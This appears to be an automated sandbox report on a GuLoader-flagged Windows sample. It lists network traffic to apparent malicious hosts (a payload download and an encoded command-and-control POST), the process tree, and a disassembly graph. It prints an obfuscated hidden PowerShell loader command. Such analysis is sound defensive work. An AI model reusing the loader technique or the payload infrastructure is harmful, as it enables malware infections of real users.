                                              Jan 15, 2025 17:37:49.965702057 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.965737104 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.965763092 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.965773106 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.965806007 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.965842009 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.965941906 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.966274977 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.966613054 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.966774940 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.971106052 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:51.388237000 CET5239980192.168.2.6107.151.162.135

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 15, 2025 17:37:20.839575052 CET53644421.1.1.1192.168.2.6
                                              Jan 15, 2025 17:37:48.249058008 CET5563953192.168.2.61.1.1.1
                                              Jan 15, 2025 17:37:48.288681030 CET53556391.1.1.1192.168.2.6
                                              Jan 15, 2025 17:37:49.482278109 CET6145953192.168.2.61.1.1.1
                                              Jan 15, 2025 17:37:49.495398045 CET53614591.1.1.1192.168.2.6

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 15, 2025 17:37:48.249058008 CET192.168.2.61.1.1.10x47bfStandard query (0)electricsuitcase.netA (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.482278109 CET192.168.2.61.1.1.10x9a0bStandard query (0)b2csa.icuA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 15, 2025 17:37:48.288681030 CET1.1.1.1192.168.2.60x47bfNo error (0)electricsuitcase.net107.151.162.135A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.32.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.16.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.112.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.96.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.64.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.80.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.48.1A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • electricsuitcase.net
                                              • b2csa.icu

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.652399107.151.162.135801944C:\Windows\SysWOW64\msiexec.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 15, 2025 17:37:48.298095942 CET214OUTGET /wp-includes/block-bindings/wTryLAihFvcVmUK202.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                              Host: electricsuitcase.net
                                              Cache-Control: no-cache
                                              Jan 15, 2025 17:37:48.886574984 CET1236INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Wed, 15 Jan 2025 16:37:48 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 114752
                                              Last-Modified: Sat, 11 Jan 2025 08:23:23 GMT
                                              Connection: keep-alive
                                              ETag: "67822a7b-1c040"
                                              Accept-Ranges: bytes
                                              Data Raw: f5 e1 cf 10 48 82 15 75 92 de b7 df b9 df 78 81 26 5d ab 93 43 0c ac 24 13 bc 6c 0a 14 b8 d8 e3 d1 a8 a3 9c 98 df 75 9d 56 21 0e 42 48 6b 36 12 ed 59 e8 7e 3a 93 a1 52 0c c6 4e dd 37 35 8e e4 e4 ea ae f3 80 ef e5 12 10 12 1c ab 44 28 21 f8 f7 9e e1 26 69 53 e0 0c 18 be 9a f2 d8 b1 c1 c6 be fe 10 20 0c 13 c8 1c 18 cf c8 16 33 d3 c9 27 11 dc 2e d6 b7 88 fe 26 cc 33 33 49 86 55 af e7 7a 93 a0 ee 18 7a 13 19 e3 be 2e 06 84 21 db ee 8a 8d dd 17 15 3a 47 db 44 99 58 c7 04 58 01 70 e6 cc 09 29 ce 30 62 aa ee 2c a3 0e b8 c1 b1 ca 9c fb 13 3e 7d 50 5b b4 95 84 2e 76 1a bb 1c 06 7f f0 53 67 23 aa 88 69 c3 ad f9 bc a1 b8 ca 12 41 b2 1e 5b d9 17 87 c7 c0 77 33 59 b0 97 92 e8 14 59 2f 57 9e be ba 6f c7 48 70 0c d8 f9 c8 87 11 00 34 04 90 41 4d fb fb 13 2d 03 5b 08 13 bf cd f9 55 f5 9f 3f 99 4f fa 40 59 bd bb aa 5f 1d 10 96 ae 36 00 4d 93 86 f0 ef 5c d2 ed f3 8d 9f bd bb be 1b 7e fb 54 16 62 de b6 40 d7 de 87 c6 8e af 7c e5 46 b6 ea 0f ff 37 f7 20 e4 8f 1a 5e a1 89 1b 8a 0a 11 51 26 84 eb c6 4c 02 91 11 ca 08 d9 [TRUNCATED]
                                              Data Ascii: Hux&]C$luV!BHk6Y~:RN75D(!&iS 3'.&33IUzz.!:GDXXp)0b,>}P[.vSg#iA[w3YY/WoHp4AM-[U?O@Y_6M\~Tb@|F7 ^Q&Lg~kih88lC6i\*%lK`y\HQlu^39e0jL%|hLr5KQ'g%yVny-[)#dBY-)>:s6JX-V0Fy!k<8Rjr<pEnh9Rd]T@4lJ48[{E<BQ(:%K6)v?I?x\&7f=Hlo".]tGZK'EJPyow E!^@}b&u3x+"IO?]f\&KM;k vED*Dsc3bH!-H(Z=i0>Eb]U6t[vKOG1=vGgb!lX}&rf{& px@Y1UvM%I SYImv,>B">2}%)r|]0`D$RX){H 5;W.1(#
                                              Jan 15, 2025 17:37:48.886595011 CET1236INData Raw: 64 e5 d0 ae 99 1a 88 21 9f 63 19 95 ba 87 bf 2d 49 dc c7 c7 c7 4d 90 da 80 73 78 04 bd d3 c4 83 92 d8 cd f0 5e 2c f8 00 e2 05 e1 2f 91 6d a3 28 db b5 51 17 23 5e 36 8b 3e 37 ef ff b2 1d 8a 8a 00 20 80 55 ab 04 61 09 6f 17 93 fb bd 51 5b fa c3 cc
                                              Data Ascii: d!c-IMsx^,/m(Q#^6>7 UaoQ[:x~h$PdXD=$*fluN3{*qsL_Z! T8U9W@J|a/0d9B-FmJfCUojAZXym
                                              Jan 15, 2025 17:37:48.886619091 CET1236INData Raw: 7b 19 99 82 8a f1 44 69 9b 79 0f 10 a3 e1 3f 7a d9 bb b1 30 56 90 7a df 57 d3 eb 9a 92 50 5c c3 53 03 cf af 97 b4 cd 8d 61 7c f7 0c 19 57 a2 04 dc 5d b2 c0 20 ce 62 00 23 1d a6 c1 a0 6e 71 95 98 be 2c d1 ec 6f 7e e1 9f c4 24 8f 9d dd 6d bf 2d 8d
                                              Data Ascii: {Diy?z0VzWP\Sa|W] b#nq,o~$m-4tUL<&x3\+AY-u+}V#peDs$`qH8hVo0|O1p*APj]|6_[^gf_TV-:c9|)%~5t!(E]%
                                              Jan 15, 2025 17:37:48.886635065 CET672INData Raw: 53 03 68 4b c5 d0 67 3c 3e 95 1d 71 4c 2e 5d 55 7e 99 db da 82 f0 1f 5d 46 96 45 75 84 71 ab ac a9 0f 81 d5 2a de e4 e5 46 c5 e6 22 2a bc 05 02 60 8b fd 75 3f a1 d3 54 85 ee 99 c4 fc 68 eb 81 93 3d 99 7c 72 21 06 1d 22 fc 01 ed 76 3b a4 98 52 e2
                                              Data Ascii: ShKg<>qL.]U~]FEuq*F"*`u?Th=|r!"v;R8:,D,,KW9<$X-D0\ ED`<^<Mo0Y]?71Q2$aZ5^qU$U}lat/o,Wer?n=w11
                                              Jan 15, 2025 17:37:48.886692047 CET1236INData Raw: a8 15 66 3f b4 c8 cc f2 0c d8 f9 43 ec 19 8b f1 07 d3 4d c6 2b 76 1f 1a 28 8a 8b e9 b3 b2 fd de 0d b4 c1 12 89 d1 85 da 45 b7 d7 4b 90 5c b2 af bd d6 66 c0 8e f3 38 d7 17 05 36 76 60 42 50 af 96 32 df 55 9d b5 5d 5c 44 5a 98 83 2e 3c 54 83 1a cd
                                              Data Ascii: f?CM+v(EK\f86v`BP2U]\DZ.<TzoZ1zXBBkrt{VF[{\Buet{':dKyyeO]w&zrQq7y]Y{B! N%5U_d
                                              Jan 15, 2025 17:37:48.886708021 CET1236INData Raw: ab d9 69 b5 42 cf f3 ad b4 72 40 44 21 41 8e b0 0f f8 40 a7 77 a8 b2 09 2d cb 8f 49 85 79 47 91 e9 e0 49 4f eb e1 54 9d 06 bb 2e da ff 37 15 ad 5b 6b 09 f7 02 1d 71 7d 5a 83 60 a4 ed 0c 6c 6f 03 9e fe f6 27 0e 1d b0 89 46 69 00 69 79 5f ca f0 87
                                              Data Ascii: iBr@D!A@w-IyGIOT.7[kq}Z`lo'Fiiy_|{bFTA^,gih`u&|;uAO+M"{^4>z\Cq<`QI'O.X({hp13#hwcUl8Mu\1n/b0?A
                                              Jan 15, 2025 17:37:48.886723995 CET448INData Raw: fc 49 bd f5 a2 05 ec 16 4d b2 c7 29 a3 df bd 25 71 37 b4 e1 df 30 06 1f 18 f8 00 aa 44 8c 18 af 96 07 73 63 50 2e 6a e5 fc d2 aa f8 da b7 88 7d c6 a4 ee 70 53 c5 48 a1 4f b8 ba b9 0f d5 68 3f 3e 45 75 a5 e9 e9 af de 21 60 d7 0b 33 fe ac 9b d3 7d
                                              Data Ascii: IM)%q70DscP.j}pSHOh?>Eu!`3}Axa>D{ RWG[h4zV_-q3fHfQ6t%Y;!4@xWFLqniu9`|&^*,VyCeAbmb%H[v
                                              Jan 15, 2025 17:37:48.886869907 CET1236INData Raw: 88 47 9e 89 3b 57 ea 18 7d 45 26 42 b2 bd d4 ab 3a af a6 a5 4d c4 4f f1 6e 29 b0 05 d0 bd 3f 28 48 a4 ec d7 06 27 a9 8e fd f0 1b 79 29 7e 16 b6 8d 89 79 1e 72 bb f8 b6 b0 ba 72 c0 f7 c9 9d d2 92 2a 22 26 df 46 35 ac b8 1d da 87 1e 41 0f b9 26 3b
                                              Data Ascii: G;W}E&B:MOn)?(H'y)~yrr*"&F5A&;+]q^X\|##qhXCnUf{_1l.P3E^HN]Kp""/.ptUfF6,4#n@%G+2!HKe%|_y\UM) ~
                                              Jan 15, 2025 17:37:48.886887074 CET1236INData Raw: 10 04 c5 99 f3 0c 32 07 1e d3 66 14 d3 77 44 82 d0 81 b6 12 c3 a2 55 9d 07 de e9 7f 52 e8 c4 9f cf b3 8c 66 91 6e f9 f9 2c 6b 59 04 13 ce 86 18 30 24 83 ed 4a 02 4c 1d d4 8b 0d c1 42 0d 3a c9 21 20 9d 07 d9 8f 7d c9 f2 99 5a 29 b9 46 c1 bf 43 b1
                                              Data Ascii: 2fwDURfn,kY0$JLB:! }Z)FCtYz97u<27*t_N4$@)= R[@vzi$ln#Fjs9K'NJ4S-Kj~c9?FOM_Remo%d9>F
                                              Jan 15, 2025 17:37:48.886903048 CET448INData Raw: 10 e8 87 a7 01 ce c8 d5 2c 0b d5 0a 9e 67 9d 88 72 c5 5a 6f 65 d8 69 b4 d9 17 cd 99 d2 fa 0a 2d d0 be dc 5c ee 80 85 9f 07 f7 d7 98 47 11 d6 70 1a 08 04 37 08 62 82 93 f7 5a e2 45 d4 da 89 74 60 80 0a fe fe 8e 54 fc fc 49 32 99 07 3f 72 25 46 a8
                                              Data Ascii: ,grZoei-\Gp7bZEt`TI2?r%FLXKhI$[2]r-:@i(TB*ZbkEg%Ug78g#GgX8:(Bi<ZnY5C("^~!Fhzn8nA 2*&,s
                                              Jan 15, 2025 17:37:48.891781092 CET1236INData Raw: b7 01 81 77 00 99 13 a3 54 a9 14 d0 3a 6f 58 ff ba e4 85 4c d3 10 18 b8 c8 6f d4 fe cb fb 56 44 69 3b ba 13 2d eb 3a f7 ec 40 0e aa 03 a2 21 5f 29 0e fa f1 49 36 a6 aa ef 5c 10 1d 6d 89 0a 4d 93 86 69 18 a3 52 2f c3 be 5f 37 7a 36 0f 78 70 97 ad
                                              Data Ascii: wT:oXLoVDi;-:@!_)I6\mMiR/_7z6xph@N)|MV>3m[^3Ga&n.,u>R .=@o4Y@lO`WlK:z[X8DLr1,Lvto;#vyE&d


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.652410104.21.32.1801944C:\Windows\SysWOW64\msiexec.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 15, 2025 17:37:49.501498938 CET273OUTPOST /PL341/index.php HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                              Host: b2csa.icu
                                              Content-Length: 111
                                              Cache-Control: no-cache
                                              Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 26 66 9a 26 66 9d 45 70 9d 36 70 9d 34 10 8b 30 63 8b 30 6c 8b 31 11 e8 47 70 9d 35 13 8b 30 64 8b 30 61 8b 30 6d eb
                                              Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&g&f&fEp6p40c0l1Gp50d0a0m
                                              Jan 15, 2025 17:37:49.965646029 CET1236INHTTP/1.1 403 Forbidden
                                              Date: Wed, 15 Jan 2025 16:37:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Frame-Options: SAMEORIGIN
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTVYzcncbwZN93Zokk1tNPrNLZiYYMYKHAu2EIUPoeNNWthLUFPlwVBGThHp%2FyMTu5eqdNVYBd1rh5anhsst%2FckwQuqqF4dAP3ZVKtDqn3jU6%2B6t3qsGTbUbAwE%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 90274aeafed88ce6-EWR
                                              Data Raw: 31 31 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 [TRUNCATED]
                                              Data Ascii: 11d0<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-c
                                              Jan 15, 2025 17:37:49.965702057 CET1236INData Raw: 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74
                                              Data Ascii: ss" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (
                                              Jan 15, 2025 17:37:49.965737104 CET1236INData Raw: 69 73 68 69 6e 67 2e 3c 2f 73 74 72 6f 6e 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 50 68 69 73 68 69 6e 67 20 69 73 20 77 68 65 6e 20 61 20 73 69 74 65 20 61 74 74 65 6d 70 74 73 20 74 6f 20 73 74 65 61 6c 20 73 65 6e 73 69 74
                                              Data Ascii: ishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p>
                                              Jan 15, 2025 17:37:49.965773106 CET1236INData Raw: 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65
                                              Data Ascii: -0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">90274aeafed88ce6</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</spa
                                              Jan 15, 2025 17:37:49.965806007 CET175INData Raw: 2d 2d 20 2f 2e 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 2d 2d 3e 0a 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72
                                              Data Ascii: -- /.error-footer --> </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>0


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:11:37:00
                                              Start date:15/01/2025
                                              Path:C:\Users\user\Desktop\DOCU800147001.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\DOCU800147001.exe"
                                              Imagebase:0x400000
                                              File size:963'872 bytes
                                              MD5 hash:AB99E49A4471901468BBBD9CCF228DE0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:11:37:01
                                              Start date:15/01/2025
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "
                                              Imagebase:0xb20000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2547628074.000000000B13B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:11:37:01
                                              Start date:15/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:11:37:40
                                              Start date:15/01/2025
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                              Imagebase:0x7ff7934f0000
                                              File size:59'904 bytes
                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2613773694.0000000005D6B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:21.3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:22%
                                                Total number of Nodes:1257
                                                Total number of Limit Nodes:34
                                                execution_graph 3537 4019c0 3538 4029ff 18 API calls 3537->3538 3539 4019c7 3538->3539 3540 4029ff 18 API calls 3539->3540 3541 4019d0 3540->3541 3542 4019d7 lstrcmpiA 3541->3542 3543 4019e9 lstrcmpA 3541->3543 3544 4019dd 3542->3544 3543->3544 3545 4035c1 3546 4035cc 3545->3546 3547 4035d0 3546->3547 3548 4035d3 GlobalAlloc 3546->3548 3548->3547 2780 4022c2 2781 4022f2 2780->2781 2782 4022c7 2780->2782 2792 4029ff 2781->2792 2809 402b09 2782->2809 2785 4022ce 2786 4022d8 2785->2786 2789 40230f 2785->2789 2788 4029ff 18 API calls 2786->2788 2787 4022f9 2798 402a3f RegOpenKeyExA 2787->2798 2790 4022df RegDeleteValueA RegCloseKey 2788->2790 2790->2789 2793 402a0b 2792->2793 2813 405b9c 2793->2813 2796 402a38 2796->2787 2799 402ad3 2798->2799 2803 402a6a 2798->2803 2799->2789 2800 402a90 RegEnumKeyA 2801 402aa2 RegCloseKey 2800->2801 2800->2803 2852 405ea5 GetModuleHandleA 2801->2852 2802 402ac7 RegCloseKey 2808 402ab6 2802->2808 2803->2800 2803->2801 2803->2802 2805 402a3f 3 API calls 2803->2805 2805->2803 2807 402ae2 RegDeleteKeyA 2807->2808 2808->2799 2810 4029ff 18 API calls 2809->2810 2811 402b22 2810->2811 2812 402b30 RegOpenKeyExA 2811->2812 2812->2785 2818 405ba9 2813->2818 2814 405dcc 2815 402a2c 2814->2815 2847 405b7a lstrcpynA 2814->2847 2815->2796 2831 405de5 2815->2831 2817 405c4a GetVersion 2817->2818 2818->2814 2818->2817 2819 405da3 lstrlenA 2818->2819 2822 405b9c 10 API calls 2818->2822 2824 405cc2 GetSystemDirectoryA 2818->2824 2825 405cd5 GetWindowsDirectoryA 2818->2825 2826 405de5 5 API calls 2818->2826 2827 405b9c 10 API calls 2818->2827 2828 405d4c lstrcatA 2818->2828 2829 405d09 SHGetSpecialFolderLocation 2818->2829 2840 405a61 RegOpenKeyExA 2818->2840 2845 405ad8 wsprintfA 2818->2845 2846 405b7a lstrcpynA 2818->2846 2819->2818 2822->2819 2824->2818 2825->2818 2826->2818 2827->2818 2828->2818 2829->2818 2830 405d21 SHGetPathFromIDListA CoTaskMemFree 2829->2830 2830->2818 2837 405df1 2831->2837 2832 405e59 2833 405e5d CharPrevA 2832->2833 2835 405e78 2832->2835 2833->2832 2834 405e4e CharNextA 2834->2832 2834->2837 2835->2796 2837->2832 2837->2834 2838 405e3c CharNextA 2837->2838 2839 405e49 CharNextA 2837->2839 2848 405635 2837->2848 2838->2837 2839->2834 2841 405ad2 2840->2841 2842 405a94 RegQueryValueExA 2840->2842 2841->2818 2843 405ab5 RegCloseKey 2842->2843 2843->2841 2845->2818 2846->2818 2847->2815 2849 40563b 2848->2849 2850 40564e 2849->2850 2851 405641 CharNextA 2849->2851 2850->2837 2851->2849 2853 405ec1 LoadLibraryA 2852->2853 2854 405ecc GetProcAddress 2852->2854 2853->2854 2855 402ab2 2853->2855 2854->2855 2855->2807 2855->2808 3549 402b44 3550 402b53 SetTimer 3549->3550 3551 402b6c 3549->3551 3550->3551 3552 402bc1 3551->3552 3553 402b86 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3551->3553 3553->3552 3554 402647 3555 4029ff 18 API calls 3554->3555 3556 40264e FindFirstFileA 3555->3556 3557 402671 3556->3557 3561 402661 3556->3561 3562 405ad8 wsprintfA 3557->3562 3559 402678 3563 405b7a lstrcpynA 3559->3563 3562->3559 3563->3561 3567 4023ca 3568 402b09 19 API calls 3567->3568 3569 4023d4 3568->3569 3570 4029ff 18 API calls 3569->3570 3571 4023dd 3570->3571 3572 4023e7 RegQueryValueExA 3571->3572 3573 402665 3571->3573 3574 402407 3572->3574 3575 40240d RegCloseKey 3572->3575 3574->3575 3578 405ad8 wsprintfA 3574->3578 3575->3573 3578->3575 3219 4030cb #17 SetErrorMode OleInitialize 3220 405ea5 3 API calls 3219->3220 3221 403110 SHGetFileInfoA 3220->3221 3292 405b7a lstrcpynA 3221->3292 3223 40313b GetCommandLineA 3293 405b7a lstrcpynA 3223->3293 3225 40314d GetModuleHandleA 3226 403164 3225->3226 3227 405635 CharNextA 3226->3227 3228 403178 CharNextA 3227->3228 3237 403188 3228->3237 3229 403252 3230 403265 GetTempPathA 3229->3230 3294 403097 3230->3294 3232 40327d 3234 403281 GetWindowsDirectoryA lstrcatA 3232->3234 3235 4032d7 DeleteFileA 3232->3235 3233 405635 CharNextA 3233->3237 3238 403097 11 API calls 3234->3238 3302 402c2b GetTickCount GetModuleFileNameA 3235->3302 3237->3229 3237->3233 3239 403254 3237->3239 3241 40329d 3238->3241 3384 405b7a lstrcpynA 3239->3384 3240 4032eb 3248 405635 CharNextA 3240->3248 3277 403371 3240->3277 3287 403381 3240->3287 3241->3235 3243 4032a1 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3241->3243 3244 403097 11 API calls 3243->3244 3246 4032cf 3244->3246 3246->3235 3246->3287 3250 403306 3248->3250 3257 4033b0 lstrcatA lstrcmpiA 3250->3257 3258 40334c 3250->3258 3251 40339a 3394 40538e 3251->3394 3252 40348e 3253 403511 ExitProcess 3252->3253 3255 405ea5 3 API calls 3252->3255 3260 40349d 3255->3260 3262 4033cc CreateDirectoryA SetCurrentDirectoryA 3257->3262 3257->3287 3261 4056f8 18 API calls 3258->3261 3265 405ea5 3 API calls 3260->3265 3266 403357 3261->3266 3263 4033e3 3262->3263 3264 4033ee 3262->3264 3398 405b7a lstrcpynA 3263->3398 3399 405b7a lstrcpynA 3264->3399 3269 4034a6 3265->3269 3266->3287 3385 405b7a lstrcpynA 3266->3385 3271 405ea5 3 API calls 3269->3271 3273 4034af 3271->3273 3272 403366 3386 405b7a lstrcpynA 3272->3386 3276 4034fd ExitWindowsEx 3273->3276 3282 4034bd GetCurrentProcess 3273->3282 3275 405b9c 18 API calls 3278 40342d DeleteFileA 3275->3278 3276->3253 3279 40350a 3276->3279 3330 403603 3277->3330 3280 40343a CopyFileA 3278->3280 3289 4033fc 3278->3289 3281 40140b 2 API calls 3279->3281 3280->3289 3281->3253 3284 4034cd 3282->3284 3283 403482 3285 405a2e 40 API calls 3283->3285 3284->3276 3285->3287 3286 405a2e 40 API calls 3286->3289 3387 403529 3287->3387 3288 405b9c 18 API calls 3288->3289 3289->3275 3289->3283 3289->3286 3289->3288 3290 40532d 2 API calls 3289->3290 3291 40346e CloseHandle 3289->3291 3290->3289 3291->3289 3292->3223 3293->3225 3295 405de5 5 API calls 3294->3295 3296 4030a3 3295->3296 3297 4030ad 